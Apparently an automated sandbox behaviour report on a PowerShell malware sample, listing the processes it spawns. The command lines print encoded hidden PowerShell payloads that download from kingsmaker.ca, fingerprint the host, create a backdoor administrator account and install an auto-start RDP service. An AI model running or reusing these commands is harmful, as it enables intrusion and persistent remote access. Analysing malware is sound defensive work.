Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8036:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\STARTUAC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9716:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9468:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4476:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:304:WilStaging_02

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bthmqp3g.vjp.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEED.tmp" "c:\Users\user\AppData\Local\Temp\lgpiiklc\CSCCB9B20FB8C54707B662B684DAE4C90.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Company Booklet.pdf"
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2224 --field-trial-handle=1636,i,4139433032823036426,1260113175703247658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknown	Process created: C:\Windows\Temp\svczHost.exe C:\Windows\Temp\svczHost.exe cakoi7 kingsmaker.ca
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: unknown	Process created: C:\Windows\Temp\myRdpService.exe C:\Windows\Temp\myRdpService.exe cakoi7
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
